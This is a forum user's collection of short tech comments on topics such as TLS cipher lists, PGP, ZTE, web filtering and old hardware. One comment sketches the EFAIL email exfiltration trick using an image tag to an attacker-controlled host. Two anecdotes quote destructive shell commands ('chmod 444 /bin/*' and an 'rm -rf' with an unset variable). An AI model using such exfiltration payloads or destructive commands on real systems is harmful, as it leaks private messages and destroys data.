Firstly PGP public keys are on the server and placed there by the key owners.
They can be uploaded by anyone who possesses them. Co-workers, anyone with whom you have shared the public key.
646 publicly visible posts • joined 21 Aug 2009
Active Desktop, which allowed HTML content (such as news headlines) to be shown on the user's desktop at the cost of prodigious amounts of CPU and RAM.
And bandwidth. I can remember one cow-orker enabling it, which rapidly became apparent when we looked at the ISDN logs and discovered that his desktop, left on overnight, had been connecting every few minutes, bringing the line up over and over again, incurring a call charge every time.
Routing & Core Network Loss of Resilience
They seem to have had redundancy and no outage.
One update of interest:
Engineers are continuing to work on the fibre break.
The work is currently being delayed by numerous road works.
Not only do they only support TLS1.0, but including RC4-SHA in their cipher list? Really?
Supported Server Cipher(s):
Preferred TLSv1.0 128 bits AES128-SHA
Accepted TLSv1.0 256 bits AES256-SHA
Accepted TLSv1.0 128 bits RC4-SHA
Accepted TLSv1.0 112 bits DES-CBC3-SHA
Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.0 128 bits RC4-MD5
How many here remember the optical mice on early '80s Sun worksations?
There was a special mouse pad with horizontal and vertical lines on it.
So crafting a “digital replica” for films, adverts, musicals, for commercial purposes or without explicit written consent is violation of an individual’s rights."
And what about Woody Alllen's Zelig and Dead Men Don't Wear Plaid?
The first of two (!) attacks does seem rather simple. Send email with three MIME parts: 1. <img src="http://yourserver.com/ " 2. [PGP encrypted content] 3. "> Mail client decrypts 2, concatenates three parts and does lookup on the URL which you control.
http://seclists.org/oss-sec/2018/q2/104
https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060315.html
We need a crowd-sourced distributed binary (hexagonal?) chop on the RGB triplets to find out exactly where the lawyers stop alleging that a particular shade infringes. We can then mock them mercilessly for claiming that one shade of magenta is OK and an indistinguishable one a fraction away in colour space doesn't.
ZTE: NCSC advice to select telecommunications operators with national security concerns
The NCSC has issued advice to a limited number of UK telecommunications operators regarding the potential use of ZTE equipment and services. ... NCSC assess that the national security risks arising from the use of ZTE equipment or services within the context of the existing UK telecommunications infrastructure cannot be mitigated
I wonder whether the problem was as a result of these vulnerabilities being patched:
https://twitter.com/jobertabma/status/989708798515265539
Jobert Abma, 4:32 am - 27 Apr 2018
In December I found a number bugs in @gitlab, all of which were disclosed today. The team responded swiftly and professionally and is a pleasure to work with. I'll describe each vulnerability in a separate tweet in this thread. Enjoy them and happy hacking!
http://lists.infradead.org/pipermail/linux-arm-kernel/2018-April/573548.html
Eric Biggers points out that there is no alternative block cipher suitable for low power processors to support dm-crypt or fscrypt filesystem encryption, and the alternative is no encryption at all.
Bruce Schneier's opinion is Personally, I doubt that they're backdoored
https://pbs.twimg.com/media/DbiPvH7WsAAj3Iu.jpg
"Loading failed for the <script> with the source "https://dpm.demdex.net/"...
"Loading failed for the <script> with the source "https://visitor-service.tealiumiq.com/"...
What on earth are these doing on a supposedly secure page?
Otto Frisch too, who founded Laser-Scan, which worked with RSRE on liquid crystal displays (see my earlier post).
RSRE (as it had become by the early 80's) and Laser-Scan in Cambridge worked on an alternative to individually driven LCD pixels, by drawing vector graphics using an infra-red laser to switch the phase of the LCD.
Reference to 1984 paper: Laser-Addressed Liquid Crystal Displays
I can still remember the goggles, locked doors and notice: "Do not stare into laser beam with remaining eye".
I would have thought that when BT contracted with Yahoo! to handle their customers' emails, there would have been self-congratulatory press releases on the subject, perhaps naming the muppets who at the time took the credit.
Can I find these anywhere using Google? Not a trace. The "Right to be forgotten" strikes again?
It's not only got to be genuinely random (as John von Neumann said; "Any one who considers arithmetical methods of producing random digits is, of course, in a state of sin"), but if someone else has generated the randomness you are using for your Certificate Signing Request, you cannot guarantee the security of your website ever after.
"A naive assumption is often made that reusing software ... will increase safety because the software will have been exercised extensively. Reusing software modules does not guarantee safety in the new system to which they are transferred...
As demonstrated by the Ariane 5 Launch Faliure
more or less exclusively focused on detecting submarines
Mine hunting too. Many years ago I was a contractor at Ferranti, just before they went tits-up as a result of a massive fraud. Simulating sea-bed reflections for a Type 2093 sonar, also graphics for the camera on a ROV ("yellow submarine"). Massive (for those days) Silicon Graphics Onyx / R4400.
I saw a report about this and sent an e-mail containing the following link reporting a Filmology breach on 01-Feb-2018.
They'll be coming for our toast and chips next!
Seeing all the down votes, it prompted me to try and remember what it was that MS did almost 20 years ago to try and abuse the standards procedures. I was most amused to discover that googling for microsoft kerberos "nda" returns, as the top result, Embrace, extend, and extinguish
Make Things Easy / Politicians
The antithesis to this is if you don't want someone to do something, e.g. claim a tax refund, you make it as discouraging as possible.
Web forms that show you the new question only after you have answered the previous one, so you have to keep bothering the same person over and over again for the next answer.
Confusing instructions on web forms.
Long phone calls on hold with irritating music.
Being referred from one phone number to another.
That was my morning just wasted, and I'm sure that the Sir Humphreys of this world have big smug grins on their faces.
Almost as bad as the Vogons'.
Beautiful Railway Bridge of the Silv’ry Tay!
Alas! I am very sorry to say
That ninety lives have been taken away
On the last Sabbath day of 1879,
Which will be remember’d for a very long time.
I've been getting them: 10 in the past month, two only yesterday. I'd just blacklist their IPs but Let's Encrypt use them (mandrill.com / mandrillapp.com / mcsv.net / ROCKET SCIENCE GROUP are all MailChimp aliases).
List of delivery IPs here: https://mailchimp.com/about/ips/
"Innovators who seek to revolutionize and disrupt an industry must tell investors the truth about what their technology can do today, not just what they hope it might do someday."
Magic Leap are you listening?
In 2003 I was working on web proxies for schools: Squid + DansGuardian plus a lot of customisation to allow teachers to turn all internet access on and off, allow only white-listed sites tailored for that particular lesson and block sites on demand. I'd hope that 100% of schools would have some sort of web filtering system.
In those days of limited bandwidth we even had an option to pre-load the Squid cache before the lesson started.
Tracking individual children, however, is a different matter.
That was heroic and ingenious.
My rescue mission to get the system back to normal after someone had typed
chmod 444 /bin/*involved an 8" floppy and driving from Keighley to Peterborough (about 140 miles) and back.
One moral of the story, which I am still trying to instil into my cow-orkers 30 years later, is use the symbolic modes to add or subtract explicit permissions.
And for today:
X-Clacks-Overhead: GNU Terry Pratchett
Valve Steam CLEANS Linux PCs (if you're not careful)
Dodgy shell script triggers classic rm -rf /
rm -rf "$STEAMROOT/"*
But STEAMROOT had not been set